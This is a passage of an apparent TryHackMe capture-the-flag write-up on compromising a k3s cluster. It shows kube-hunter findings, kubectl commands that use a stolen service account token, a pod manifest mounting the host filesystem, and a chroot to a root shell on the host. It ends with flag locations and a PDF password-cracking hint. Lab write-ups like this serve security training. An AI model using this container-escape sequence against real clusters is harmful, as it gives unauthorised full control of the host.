| | | | | command inside a | 4.15.0-112-generic |
| | | | | container | #113-Ubuntu SMP Thu |
| | | | | | Jul 9 23:41:39 UTC |
| | | | | | 202... |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV052 | palsforlife:10250 | Information | Exposed Pods | An attacker could | count: 4 |
| | | Disclosure | | view sensitive | |
| | | | | information about | |
| | | | | pods that are | |
| | | | | bound to a Node | |
| | | | | using the /pods | |
| | | | | endpoint | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV046 | palsforlife:10250 | Information | Exposed Kubelet | Commandline flags | cmdline: /usr/local/ |
| | | Disclosure | Cmdline | that were passed to | bin/k3sserver--dis |
| | | | | the kubelet can be | able=traefik--disab |
| | | | | obtained from the | le=metrics- |
| | | | | pprof endpoints | server--kube- |
| | | | | | apiserver-arg=a... |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV045 | palsforlife:10250 | Information | Exposed System Logs | System logs are | Could not parse |
| | | Disclosure | | exposed from the | system logs |
| | | | | /logs endpoint on | |
| | | | | the kubelet | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV038 | palsforlife:10250 | Information | Exposed Running Pods | Outputs a list of | 4 running pods |
| | | Disclosure | | currently running | |
| | | | | pods, | |
| | | | | and some of | |
| | | | | their metadata, | |
| | | | | which can reveal | |
| | | | | sensitive | |
| | | | | information | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV007 | palsforlife:6443 | Information | Listing pods using | Accessing pods might | [{'name': b'local- |
| | | Disclosure | default service | give an attacker | path-provisioner-5ff |
| | | | account token | valuable information | 76fc89d-2llm9', |
| | | | | | 'namespace': b'kube- |
| | | | | | system'}, {'name': |
| | | | | | b'nginx... |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV007 | palsforlife:6443 | Information | Listing namespaces | Accessing namespaces | ['default', 'kube- |
| | | Disclosure | using default | might give an | system', 'kube- |
| | | | service account | attacker valuable | public', 'kube-node- |
| | | | token | information | lease'] |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV007 | palsforlife:6443 | Information | Listing cluster | Accessing cluster | ['cloud-controller- |
| | | Disclosure | roles using default | roles might give an | manager', |
| | | | service account | attacker valuable | 'system:coredns', |
| | | | token | information | 'local-path- |
| | | | | | provisioner-role', ' |
| | | | | | system:k3s-controlle |
| | | | | | r... |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV005 | palsforlife:6443 | Information | Access to API using | The API Server port | b'{"kind":"APIVersio |
| | | Disclosure | service account | is accessible. | ns","versions":["v1" |
| | | | token | Depending on | ],"serverAddressByCl |
| | | | | your RBAC settings | ientCIDRs":[{"client |
| | | | | this could expose | CIDR":"0.0.0.0/0","s |
| | | | | access to or control | ... |
| | | | | of your cluster. | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV002 | palsforlife:6443 | Information | K8s Version | The kubernetes | v1.20.7+k3s1 |
| | | Disclosure | Disclosure | version could be | |
| | | | | obtained from the | |
| | | | | /version endpoint | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Patched a role | Patching a role | Patched Role Name: |
| | | | | might give an | 9f68a Namespace: |
| | | | | attacker the option | kube-system Patch |
| | | | | to create new pods | evidence: kube- |
| | | | | with custom roles | system |
| | | | | within the | |
| | | | | specific role's | |
| | | | | namespace scope | |
| | | | | | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Patched a role | Patching a role | Patched Role Name: |
| | | | | might give an | 91ad9 Namespace: |
| | | | | attacker the option | kube-node-lease |
| | | | | to create new pods | Patch evidence: |
| | | | | with custom roles | kube-node-lease |
| | | | | within the | |
| | | | | specific role's | |
| | | | | namespace scope | |
| | | | | | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Patched a role | Patching a role | Patched Role Name: |
| | | | | might give an | 7a070 Namespace: |
| | | | | attacker the option | kube-public Patch |
| | | | | to create new pods | evidence: kube- |
| | | | | with custom roles | public |
| | | | | within the | |
| | | | | specific role's | |
| | | | | namespace scope | |
| | | | | | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Patched a role | Patching a role | Patched Role Name: |
| | | | | might give an | 4161b Namespace: |
| | | | | attacker the option | default Patch |
| | | | | to create new pods | evidence: default |
| | | | | with custom roles | |
| | | | | within the | |
| | | | | specific role's | |
| | | | | namespace scope | |
| | | | | | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Patched A Pod | Patching a pod | Pod Name: ec917 |
| | | | | allows an attacker | Namespace: kube- |
| | | | | to compromise and | system Patch |
| | | | | control it | evidence: kube- |
| | | | | | system |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Patched A Pod | Patching a pod | Pod Name: bfff1 |
| | | | | allows an attacker | Namespace: default |
| | | | | to compromise and | Patch evidence: |
| | | | | control it | default |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Patched A Pod | Patching a pod | Pod Name: 5697a |
| | | | | allows an attacker | Namespace: kube- |
| | | | | to compromise and | public Patch |
| | | | | control it | evidence: kube- |
| | | | | | public |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Patched A Pod | Patching a pod | Pod Name: 38c9e |
| | | | | allows an attacker | Namespace: kube- |
| | | | | to compromise and | node-lease Patch |
| | | | | control it | evidence: kube-node- |
| | | | | | lease |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Deleted A Pod | Deleting a pod | Pod Name: f9a89 |
| | | | | allows an attacker | Deletion time: |
| | | | | to disturb | 2021-09-25T08:10:08Z |
| | | | | applications on the | |
| | | | | cluster | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Deleted A Pod | Deleting a pod | Pod Name: ec917 |
| | | | | allows an attacker | Namespace: kube- |
| | | | | to disturb | system Delete time: |
| | | | | applications on the | 2021-09-25T08:10:03Z |
| | | | | cluster | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Deleted A Pod | Deleting a pod | Pod Name: d8cc1 |
| | | | | allows an attacker | Deletion time: |
| | | | | to disturb | 2021-09-25T08:09:55Z |
| | | | | applications on the | |
| | | | | cluster | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Deleted A Pod | Deleting a pod | Pod Name: bfff1 |
| | | | | allows an attacker | Namespace: default |
| | | | | to disturb | Delete time: |
| | | | | applications on the | 2021-09-25T08:09:57Z |
| | | | | cluster | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Deleted A Pod | Deleting a pod | Pod Name: b3333 |
| | | | | allows an attacker | Deletion time: |
| | | | | to disturb | 2021-09-25T08:10:14Z |
| | | | | applications on the | |
| | | | | cluster | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Deleted A Pod | Deleting a pod | Pod Name: 5697a |
| | | | | allows an attacker | Namespace: kube- |
| | | | | to disturb | public Delete time: |
| | | | | applications on the | 2021-09-25T08:10:10Z |
| | | | | cluster | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Deleted A Pod | Deleting a pod | Pod Name: 38c9e |
| | | | | allows an attacker | Namespace: kube- |
| | | | | to disturb | node-lease Delete |
| | | | | applications on the | time: |
| | | | | cluster | 2021-09-25T08:10:16Z |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Deleted A Pod | Deleting a pod | Pod Name: 359c0 |
| | | | | allows an attacker | Deletion time: |
| | | | | to disturb | 2021-09-25T08:10:01Z |
| | | | | applications on the | |
| | | | | cluster | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Delete a namespace | Deleting a namespace | 2021-09-25T08:09:21Z |
| | | | | might give an | |
| | | | | attacker the option | |
| | | | | to affect | |
| | | | | application behavior | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Delete a namespace | Deleting a namespace | 2021-09-25T08:09:20Z |
| | | | | might give an | |
| | | | | attacker the option | |
| | | | | to affect | |
| | | | | application behavior | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created a role | Creating a role | Role name: 9f68a |
| | | | | might give an | |
| | | | | attacker the option | |
| | | | | to harm the normal | |
| | | | | behavior of newly | |
| | | | | created pods | |
| | | | | within the | |
| | | | | specified | |
| | | | | namespaces. | |
| | | | | | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created a role | Creating a role | Role name: 91ad9 |
| | | | | might give an | |
| | | | | attacker the option | |
| | | | | to harm the normal | |
| | | | | behavior of newly | |
| | | | | created pods | |
| | | | | within the | |
| | | | | specified | |
| | | | | namespaces. | |
| | | | | | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created a role | Creating a role | Role name: 7a070 |
| | | | | might give an | |
| | | | | attacker the option | |
| | | | | to harm the normal | |
| | | | | behavior of newly | |
| | | | | created pods | |
| | | | | within the | |
| | | | | specified | |
| | | | | namespaces. | |
| | | | | | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created a role | Creating a role | Role name: 4161b |
| | | | | might give an | |
| | | | | attacker the option | |
| | | | | to harm the normal | |
| | | | | behavior of newly | |
| | | | | created pods | |
| | | | | within the | |
| | | | | specified | |
| | | | | namespaces. | |
| | | | | | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created a namespace | Creating a namespace | new namespace name: |
| | | | | might give an | a352e |
| | | | | attacker an area | |
| | | | | with default | |
| | | | | (exploitable) | |
| | | | | permissions to run | |
| | | | | pods in. | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created a namespace | Creating a namespace | new namespace name: |
| | | | | might give an | 4ddc7 |
| | | | | attacker an area | |
| | | | | with default | |
| | | | | (exploitable) | |
| | | | | permissions to run | |
| | | | | pods in. | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created a cluster | Creating a cluster | Cluster role name: |
| | | | role | role might give an | af55f |
| | | | | attacker the option | |
| | | | | to harm the normal | |
| | | | | behavior of newly | |
| | | | | created pods | |
| | | | | across the whole | |
| | | | | cluster | |
| | | | | | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created a cluster | Creating a cluster | Cluster role name: |
| | | | role | role might give an | 6dc02 |
| | | | | attacker the option | |
| | | | | to harm the normal | |
| | | | | behavior of newly | |
| | | | | created pods | |
| | | | | across the whole | |
| | | | | cluster | |
| | | | | | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created A Pod | Creating a new pod | Pod Name: ec917 |
| | | | | allows an attacker | Namespace: kube- |
| | | | | to run custom code | system |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created A Pod | Creating a new pod | Pod Name: bfff1 |
| | | | | allows an attacker | Namespace: default |
| | | | | to run custom code | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created A Pod | Creating a new pod | Pod Name: 5697a |
| | | | | allows an attacker | Namespace: kube- |
| | | | | to run custom code | public |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created A Pod | Creating a new pod | Pod Name: 38c9e |
| | | | | allows an attacker | Namespace: kube- |
| | | | | to run custom code | node-lease |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created A PRIVILEGED | Creating a new | Pod Name: f9a89 |
| | | | Pod | PRIVILEGED pod would | Namespace: kube- |
| | | | | gain an attacker | public |
| | | | | FULL CONTROL over | |
| | | | | the cluster | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created A PRIVILEGED | Creating a new | Pod Name: d8cc1 |
| | | | Pod | PRIVILEGED pod would | Namespace: default |
| | | | | gain an attacker | |
| | | | | FULL CONTROL over | |
| | | | | the cluster | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created A PRIVILEGED | Creating a new | Pod Name: b3333 |
| | | | Pod | PRIVILEGED pod would | Namespace: kube- |
| | | | | gain an attacker | node-lease |
| | | | | FULL CONTROL over | |
| | | | | the cluster | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created A PRIVILEGED | Creating a new | Pod Name: 359c0 |
| | | | Pod | PRIVILEGED pod would | Namespace: kube- |
| | | | | gain an attacker | system |
| | | | | FULL CONTROL over | |
| | | | | the cluster | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV050 | Local to Pod | Access Risk | Read access to pod's | Accessing the pod | eyJhbGciOiJSUzI1NiIs |
| | | | service account | service account | ImtpZCI6IkNtT1RDZkpC |
| | | | token | token gives an | dzVWVjR2eVE2OVl3TGly |
| | | | | attacker the option | a0tVZ21oY1NrTVBuUnUw |
| | | | | to use the server | b0JUU2sifQ.eyJpc3MiO |
| | | | | API | ... |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+

Seems The priviledge is so high for this token.Even we can Create Pods and do more things.We just like a little Admin for this k3s.

According the Hacktrick, Upload binary Kubectl to do more.

but because of the APIserver is wrongly exposed out of the machine.So we also can access on our attack machine.

More infos

Get pods :

kubectl get pods -o yaml > backup.config \
--server="https://palsforlife:6443" \
--token='<Token you steal>' \
--insecure-skip-tls-verify=true

Get the pods config yaml.

kubectl get pods \
--server="https://palsforlife:6443" \
--token='<Token you steal>' \
--insecure-skip-tls-verify=true

simple nice print for pods.

We can also enumed more according the Hacktrick docs

Escaping the K3s

Hacktricks doc show us a method to escape.

The principle is same as the docker.

mount dir /root in container

chroot /bin/bash to /root in docker/other virual envs.

Steps like this : https://book.hacktricks.xyz/pentesting/pentesting-kubernetes/enumeration-from-a-pod#escaping-from-the-pod

problem: Network

The Tryhackme Network cann’t access the Public network.So pull the image from ineternet will be blocked. So we need change the image source and Policy of the evil yam.

Just to reuse the image the k3s has.

I copied the yaml at Hacktrick and modified like following.

apiVersion: v1
kind: Pod
metadata:
labels:
run: attacker
name: attacker
namespace: default
spec:
volumes:
- name: host-fs
hostPath:
path: /
containers:
- image: nginx
imagePullPolicy: IfNotPresent
name: attacker
volumeMounts:
- name: host-fs
mountPath: /root
restartPolicy: Never

Save it as evil.yaml and ready for use.

deploy

Command to trigger Build and deploy

kubectl  apply -f ./evil.yaml \
--server="https://10.10.109.75:6443" \
--token='<token you steal>' \
--insecure-skip-tls-verify=true

Yep! Shell pop again

kubectl exec -it attacker \
--server="https://10.10.109.75:6443" \
--token='<Token you steal>' \
--insecure-skip-tls-verify=true \
-- bash

ROOT!

Enjoy the root shell.

[email protected]:/# ls
bin dev docker-entrypoint.sh home lib64 mnt proc run srv tmp var
boot docker-entrypoint.d etc lib media opt root sbin sys usr
[email protected]:/# chroot /root /bin/bash
[email protected]:/# ls
bin etc initrd.img.old lost+found opt run srv tmp vmlinuz
boot home lib media proc sbin swapfile usr vmlinuz.old
dev initrd.img lib64 mnt root snap sys var
[email protected]:/# whoami
root
[email protected]:/# ls
bin etc initrd.img.old lost+found opt run srv tmp vmlinuz
boot home lib media proc sbin swapfile usr vmlinuz.old
dev initrd.img lib64 mnt root snap sys var
[email protected]:/# cd /root
[email protected]:~# ls
root.txt
[email protected]:~# cat root.txt # flag here

flags

  • flag1 located at the gitea container /data/gitea/gitea.db
  • flag2 located at the gitea container /root/flag2.txt
  • flag3 located at kubectl configmaps also avaiable at physicial machine store.db (flag2.txt also can be found)
  • flag4 located at physicial machine /root/root.txt
  • <! not-flag> in the config map get the html and you will found a pdf in base64 encoded. pdf is encrypted. you can use ctf-tool/pdf2john.py to convert it.john crack it with rockyou and see the message inside.